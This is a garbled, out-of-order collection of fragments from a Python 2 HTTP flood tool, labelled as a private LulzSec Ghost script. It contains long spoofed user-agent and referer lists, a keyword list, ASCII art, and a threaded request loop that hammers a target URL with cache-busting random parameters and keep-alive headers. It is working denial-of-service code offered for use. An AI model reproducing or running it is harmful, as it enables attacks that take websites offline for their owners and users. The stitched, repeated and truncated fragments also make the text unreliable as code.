bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\")", "headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x", "4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1)", "Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web", "Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel", "Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30", "(Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0", "(http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X", "/ , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O ._O O_.", "1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0')", "251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3')", "U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile", "6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X", "(KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)", "Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander", "headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=')", "WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT", "libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0')", "_// _// _// ~ _// ~ ~ / / / / / /", "ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real", "CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1')", "\"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _... Lulz ,'/", "headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600')", "5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)')", "headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML,", "compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47')", "One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide')", "buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code", "return(bots) #builds random ascii string def buildblock(size): out_str = '' for i in", "headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A", "blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir", "Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko)", "Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0", "//~ // // ~~ _// _// _// ~ _// ~ ~ / /", "headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx')", "usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3:", "headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com;", "6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0;", "headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0", "random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print", "(crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer')", "headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase", ": `' ,' `. / |`-:_ ; | | | : \\ `--.", "Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML,", "http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)')", "keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\")", "headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0')", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;", "bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\")", "simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001", "buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120))", "random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e:", "headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb')", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=')", "<gh_stars>0 import urllib2 import sys import threading import random import re #global params", "east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots(): global bots bots=[]", "http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0", "headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger", "8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U;", "bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str", "headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16", "set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m =", "Crawling your site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3", "headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64')", "Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows;", "AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1;", "4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous')", "like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124", "Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)')", "headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "\\ ,\\ / \\: `:\\ \\ // `:`. ,' \\ /-._; | :", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile", "Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi", "keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto", "host + '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\")", "headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0')", "Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A", "# generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>')", "bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): out_str = '' for i", "url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '='", "def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates a", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex:", "keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east')", "www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)')", "STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code)", "en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle')", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like", "(PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)')", "(compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE;", "headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19')", "at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey", "(Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S", "+ buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print", "(en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36')", "(http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3", "headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots", "headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots meta", "(http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)')", "request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host)", "Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5')", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0", "headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa')", "en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android;", "libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin", "X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X", "~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list()", "6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')", "(http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot", "Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like", "amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac 